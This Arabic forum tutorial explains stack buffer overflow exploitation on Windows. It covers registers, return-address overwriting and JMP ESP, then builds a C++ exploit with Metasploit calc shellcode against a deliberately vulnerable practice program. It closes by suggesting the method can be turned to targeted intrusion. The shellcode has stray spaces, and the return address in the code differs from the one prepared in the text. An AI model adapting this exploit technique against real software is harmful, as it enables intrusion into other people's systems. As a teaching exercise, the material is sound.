بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
اللهم صلِّ على محمد وآل محمد
هذا اول درس اكتبه عن ثغرات الفيض stack buffer overflow
وساشرح فيه ان شاء الله كيفية اكتشافها واستغلالها بنوع من التفصيل ان شاء الله
يلا بدون التكثير في الكلام نبدا ببسم الله
اولا نبدا بالاكتشاف
اكتشافها اسهل بكثير من استغلالها بحيث نقوم بارسال كمية كبيرة من البيانات عبر احد المداخل "inputs" اي كل ما يسمح لنا بادخال بيانات الى البرنامج فاذا ضهر لنا خطا فان البرنامج مصاب بثغرت فيض واذا لم يضهر فانه غير مصاب
ملاحضة : في بعض الاحيان يكون البرنامج مصاب ولكن يكون فيه كود للحماية ككود نقل التنفيذ الى كود اخر يضهر رسالة خطا دون التسبب في اغلاق البرنامج
وهذا سيجعل البعض يضن ان البرنامج غير مصاب وهذا غير صحيح
وفي هذه الحالة يمكننا اكتشاف الثغرة فقط بتتبع البرنامج باحد برامج التنقيح
تانيا الاستغلال
ربما سيكون هذا الجزء هو الاصعب ولكن ليس بعد ان تعرف اساسيات حدوث الفيض، لذا لاسهل علي الشرح واسهل عليك الفهم سابدا اولا بتعريف وتوضيح كل ما هو اساسي لاستغلال ثغرات الفيض :
1 المسجلات "Registers"
المسجلات هي مكان في بروسيسر الجهاز الذي يقوم بعمليات الحاسب الالي
2 مسجل الستاك "stack register"
هو مسجل يستعمل ليسهل على وحدة المعالجة المركزية التعامل مع داكرة النضام التي يكون البرنامج محملا عليها
3 المسجلات EIP - ESP
ESP
يشير دائما الى التعليمة التي تاتي بعد الكود المنفذ في الstack
لهذا يكتب الشل كود بعد عنوان العودة لتسهيل معرفة مكانه في الذاكرة
EIP
هو مسجل يخزن فيه عنوان التعليمة التي تاتي مبشرة بعد اي تعليمة تدهب بالتنفيد الى كود داخل الكود الرئيسي
ولفهم هذا الامر فلنرجع الى تعريف برنامج
البرنامج "Logiciel" هو مجموعة من البرانم "Programmes" كل برنام له عمل خاص
وهذه صورة موضحه
كما ترون في الحقيقة البرنامج هو الجزء الرئيسي زائد الاجزاء الفرعية التي تسمى بالبرانم وهي تقوم بعمل وحيد فقط مثلا كود اغلاق الجهاز هو برنام واذا اردنا اطفاء الجهاز عن طريق زر في برنامج نضع في كود دلك الزر امر لاستدعاء هذا البرنام ليقوم بدوره باطفاء الجهاز
مثال اخر :
في الصورة اعلاه وبالضبط الزر "اضهار رسالة",,عندما نضغط عليه فان البرنامج يقوم باستدعاء البرنام المسؤول عن اضهار رسالة ويمرر التنفيذ اليه فنصبح الان خارج البرنامج الرئيسي وذاخل برنامج فرعي يقوم باضهار الرسالة
وعند ضهور الرسالة تكون مهمة البرنامج الفرعي قد انتهت وبذلك يمرر التنفيذ للبرنامج الرئيسي مرة اخرى
لنوضح اكثر بهذه الصورة
لا شك ان صورة كيفية وقوع الفيض بدات تتضح لديك
ان استطعنا ان نغير عنوان العودة فاننا قد ندهب بالتنفيذ الى اي مكان نريده
مثلا ان ندهب بالتنفيذ الى عنوان الشل كود
دعني اوضح لك اكثر
عندما يحجز المبرمج متغير ما فان حالة الstack تكون كالتالي
كود:
buffer | 41414141
| 41414141
return addr | 004012A1
يعني اذا لم يقم المبرمج بالتاكد من طول البيانات المدخلة و طول المتغير
فان ادخال بيانات طويلة سيمكننا من الكتابة فوق عنوان العودة ليصبح الستاك كالتالي
كود:
buffer | 41414141
| 41414141
return addr | 41414141
A = 41 اذا حولناه الى قيم الهكس
فكل ما ندخله الى البرنامج
يحول الى قيم هيكس يعني لا يحفض كما هو فلو اذخلنا الى برنامج ABCD
41 42 43 44
بحيث
A = 41
B = 42
C = 43
D = 44
ويكتبها بالمقلوب
DCBA
قد تلاحظ اننا دخلنا مباشرة في الاستغلال ولكن لا تقلق سنبصط اكثر واكثر حتى يصبح الدرس اسهل وفي متناول الجميع
لنستمر في شرح الاساسيات
4 الشل كود "shellcode"
الشل كود عبارة عن برنامج/برنام مكتوب بطريقة احترافية تخوله للعمل في اي نضام دون الحاجة الى اي برنامج اخر (مترجم) وهذه الخاصية هي الاهم وهي التي تجعلنا نضع الشل كود في الثغرات لانه كما تعلم عندما تخترق عن بعد لا يمكنك ارفاق مترجم مع البرنامج بل تحتاج برنامج جاهز ما ان يصل الى الذاكرة يصبح قابل للتنفيذ .
الان وبعد ان فهمنا الاساسيات دعونا نقوم بخطوة لنتقدم بالموضوع الى الامام
وهي تلخيص فكرة كتابة استغلال ثغرة فيض المكدس :
ليحدث فيض يجب ان يكون لدينا متغير ذو حجم معين مثلا 260 بايت يجب علينا ادخال كمية كبيرة من المعلومات اي مثلا لو ادخلنا 270 فالبرنامج قادر فقط على تخزين 260 حرف و 10 احرف المتبقية فلا مكان لها بل سيكتبها فوق كل ما هو موجود بعد المساحة المحددة من طرف البرنامج وكما تعلمون عنوان العودة يكون ايضا بعد هذه المساحة اذن هكذا سيتم الكتابة فوقه وهكذا سنتحكم في البرنامج وذلك بتغيير عنوان العودة الى اي عنوان نريده
الان عرفنا كيف نتحكم في سير البرنامج اي فهمنا كيف نغير عنوان العودة
ماذا بعد ؟
تحدثت لنا على الشلكود وقلت انه يكتب ايضا في الذاكرة وللوصول الى هدفنا (وهو تنفيد الشلكود في جهاز الضحية) كيف سنعرف مكان هذا الشل كود ؟ او كيف نعرف عنوانه لكي نقوم بكتابته فوق عنوان العودة ؟
الجواب هو :
عند ادخال الشل كود الى البرنامج يكون على الشكل التالي
AAAAAAAA+عنوان العودة+shellcode
ويصبح بعد كتابته في الذاكرة
buffer (A's) | 41414141
41414141 |
عنوان العودة| عنوان العودة الجديد
الشل كود | الشل كود يوجد مباشرة بعد عنوان العودة
وهنا ياتي دور المسجل ESP راجع تعريفه "ضروري"
اكيد عرفتها قلنا انه هذا المسجل يسجل عنوان التعليمة التي بعد التعليمة المنفذة
وفي حالتنا هذه التعليمة المنفذة هي retn
اي العودة الى عنوان العودة وبما ان الشل كود موجود مباشرة بعدها هذا يعني ان العنوان المخزن بالمسجل ESP هو عنوان الشل كود
لذا لكي ننفذ الشل كود او لننقل التنفيذ اليه يجب علينا البحث عن قفزة للمسجل ESP
صورة تبسيطية :
ضنك الان فهمت كيف ينفذ الشل كود (ان لم تفهم اعد القراءة "تساعد على الفهم اكثر") .
قذ تلاحظ ان هذا الجزء كله نضري ولن ادعك تقول هذا في رد بل سننتقل الان الى الجزء التطبيقي من الدرس
سنقوم بكتابة استغلال لبرنامج مصاب بثغرة فيض طبعا نحن من سيقوم بكتابته وبلغة سي ثم نقوم بعمل اكسبلويت له ان شاء الله
يلا نبدا ببسم الله
هذا هو سورس كود برنامجنا التطبيقي
كود PHP:
#include <stdio.h>
#include <string.h>
void overflow_function (char *str)
{
char buffer[256];
strcpy(buffer, str);
}
int main(int argc, char **argv)
{
overflow_function(argv[1]);
return 0;
}
يجب عليك ترجمته بمترجم مايكروسوفت لضمان ان تكون النتائج مطابقة بين الشرح وتطبيقك
"Visual C++ 6.0"
كما ترى اكواد بسيطة جدا ولكن لاباس بشرحها
كما ترى الدالة التي يحدث فيها الخطا هي دالة strcpy
حيث يتم نقل محتوى المتغير str الى المتغير buffer
وعليه اذا كان حجم المتغير str اكبر من 256 فانه سيتم الكتابة فوق عنوان العودة
هيا بنا فلنبدا بمعرفة هل البرنامج مصاب ام لا
بعد ترجمته شغله انطلاقا من الدوس ومرر اليه سلسلة من الحروف كبيرة
ولتكن 300A
اي الحرف A 300 مرة
كما تلاحظ ضهو الخطا معناه ان البرنامج مصاب
الان انتهت مرحلة الكشف عن الخطا وجاء دور كتابة الاستغلال ( هو سهل فقط شوية تركيز
اول خطوة يجب القيام بها هو تحديد كم عدد من البيتات تلزمنا قبل ان نصل الى عنوان العودة يعني من بداية البفر الى اخر بايت قبل عنوان العودة
ولعمل هذا نقوم بادخال سلسلة من الاحرف مختلفة الى البرنامج ويفضل ان تكون هاش
استعن بهذا الموقع وشفر مجموعة كلمات مختلفة ثم اجمع الهاشات فما بينها حتى تحصل على 300 بايت
كود:
كود PHP:
3691308f2a4c2f6983f2880d32e29c8403c7c0ace395d80182 db07ae2c30f0345d41402abc4b2a76b9719d911017c592ce57 579e09df9aa67e82a9552789b1f14d4098d64e163d27269594 55d046fd7cded9fd7fac6bfe771195dc39cd7644c72035a617 74315c394238af637e64a30e2035a61774315c394238af637e 64a30e6ba667f2e5fb6e2e9a9edd14f49a3d5312e24270d85b
تح البرنامج المصاب بالمنقح اولي ollydbg ومرر اليه سلسلة الاحرف وذلك باختيار argument من قائمة debug
ثم انتر ثم اضغط على ctrl+f2 ثم اختر يس ليعاد تحميل البرنامج
بعد دلك اضغط على F9 ليتم تشغيل البرنامج
والنتيجة رسالة خطا
اضغط انتر
ثم قم بعمل كما في الصورة التالية
عد دلك عد الى السلسلة التي ادخلناها وقم بالبحث عن تلك الحروف والارقام التي قلت لك احفضها في الصورة اعلاه وستكون النتيجة كالتالي
قم بمسح 67f2 وكل ماياتي بعدها ليكون عدد البيتات الباقي هو 260
وهكذا نكون قد حددنا حجم البفر
الخطوة التانية هي البحث عن عنوان العودة المناسب وللقيام بهذا العمل يلزمنا برنامج اسمه findjmp
ووضيفته هي اجاد اي قفزة للمسجل esp وبالتالي يتم تنفيذ الشل كود
RapidShare: 1-CLICK Web hosting - Easy Filehosting
فك الضغط عنه وضعه في القرص c: ثم شغله من الدوس وافعل كما في الصورة
بعد ان احصلنا على عنوان القفزة فلنعدل عليه كما يلي
0x7C86379E
اقلب ترتيب كل عددين ليصبح
9E 37 86 7C
الان اضف اليه x\ ليصبح
\x9E\x37\x86\x7C
الان انتهينا من اعداد عنوان العودة الجديد
والخطوة التالية هي اعداد الشل كود الذي نريده
فكما تعلمون هناك شل كودات كثيرة حسب عملها فهناك منها من يقوم بتشغيل الحاسبه وهذا هو الذي يستعمل عند مكتشفي الثغرات لكي يجربو نجاح الثغرة
وهناك شل كود لفتح منفذ او تحميل باتش وتشغيله في جهاز الضحية
هيا بنا اذن فلنقم بانشاء شل كود للتجربة فقط وهو شل كود بعد تنفيذ الثغرة يشغل لنا الالة الحاسبة المرفقة مع الوندوز
ولهذا الغرض نستعين بالله و بموقع ميتاسبلويت
وهو
كود PHP:
http://www.m e t asploit.com:55555/PAYLOADS?FILTER=win32
(الفراغات بسبب التشفير)
ازل الفواصل بين كلمة ميتا
ثم اختر تنفيد الاوامر
windows excute command
سينتج لنا شل كودين
اختر الاول كما في الصورة ( لا تنسى اي شيء والا لن يعمل الاكسبلويت )
لان اصبح كل شيء جاهزا وبقي فقط كتابة الاكسبلويت
ويمكننا فعل ذلك باية لغة برمجة مثلا c++ او c او بيرل او بيتون ...الخ
انا ساستخدم لغة c++
المهم قبل فعل هذا دعني اوضح لك فكرة عمل الاستغلال فمن فهم الفكرة سيستطيع كتابة استغلاله باي لغة اراد
اولا لكي تنفذ الثغرة ويتم تشغيل الحاسبة يجب علينا تمرير سلسلة حروف لملء البفر + عنوان القفزة + الشلكود
junkdata+return address+shellcode
اذن الاكسبلويت سيقوم بجمع كل هذه الاشياء ثم يشغل البرنامج المصاب ويمرر اليه هده السلسلة
(اي كود الاستغلال junkdata+return address+shellcode )
هذا هو كود الاستغلال
كود:#include <windows.h>
#include <string.h>
#include <stdio.h>
int main()
{
//file name
char exploit[700]="vuln.exe ";
//ret addr
char ret[] = "\xC0\x68\x83\x7C";
//junk data
char overflow[260];
for(int i=0;i<260;i++){
overflow[i]=0x41;
}
/*
* windows/exec - 144 bytes
* http://www.****sploit.com
* Encoder: x86/shikata_ga_nai
* EXITFUNC=process, CMD=calc
*/
char shellcode[] =
"\xbf\xdb\xf9\x8c\x6d\x31\xc9\xb1\x1e\xda\xcd\ xd9\ x74\x24\xf4"
"\x58\x31\x78\x0f\x03\x78\x0f\x83\xe8\x27\x1b\ x79\ x91\x3f\x98"
"\x82\x6a\xbf\xaa\xc6\x56\x34\xd0\xcd\xde\x4b\ xc6\ x45\x51\x53"
"\x93\x05\x4e\x62\x48\xf0\x05\x50\x05\x02\xf4\ xa9\ xd9\x9c\xa4"
"\x4d\x19\xea\xb3\x8c\x50\x1e\xbd\xcc\x8e\xd5\ x86\ x84\x74\x12"
"\x8c\xc1\xfe\x45\x4a\x08\xea\x1c\x19\x06\xa7\ x6b\ x42\x0a\x36"
"\x87\xf6\x2e\xb3\x56\xe2\xc7\x9f\x7c\xf0\x14\ x40\ x4c\x0e\xfa"
"\x29\xca\x65\xbc\xe5\x99\x3a\x4c\x8d\xee\xa6\ xe1\ x1a\x66\xdf"
"\x70\xe4\xf4\x1f\xe8\x45\x93\x6f\x66\x61\x3c\ xf8\ xee\x94\x48"
"\xf6\x59\x96\xaa\x64\x04\x04\x56\x6b";
printf("Exploiting ......\n");
strcat(exploit, overflow);
strcat(exploit, ret);
strcat(exploit, shellcode);
WinExec(exploit,0);
printf("Exploitation Finished\n");
return 0;
}
ترجمه وضعه في نفس المجلد الذي وضعت فيه البرنامج المصاب ثم شغله والنتيجة هي اشتغال الالة الحاسبة
وهذا فيديو تطبيقي من صاحب الموضوع الأصلي : 
كود PHP:
http://www.ouatmane.org/mr-cracker.rar
وياليت اننا نتعمق شوي في الميتاسبلويت والشل كود
وطبعا البفر فلو هي من اساسيات الثغرات المستخدمه فيها
ولا ننسى طبعا بأمكان الشخص تحويل كل ذلك في الاختراق المستهدف
والصلات والسلام على سيدنا محمد صلى الله عليه وسلم
شرح ثغرات فيض المكدس::حصريا overflow
العرض العادي
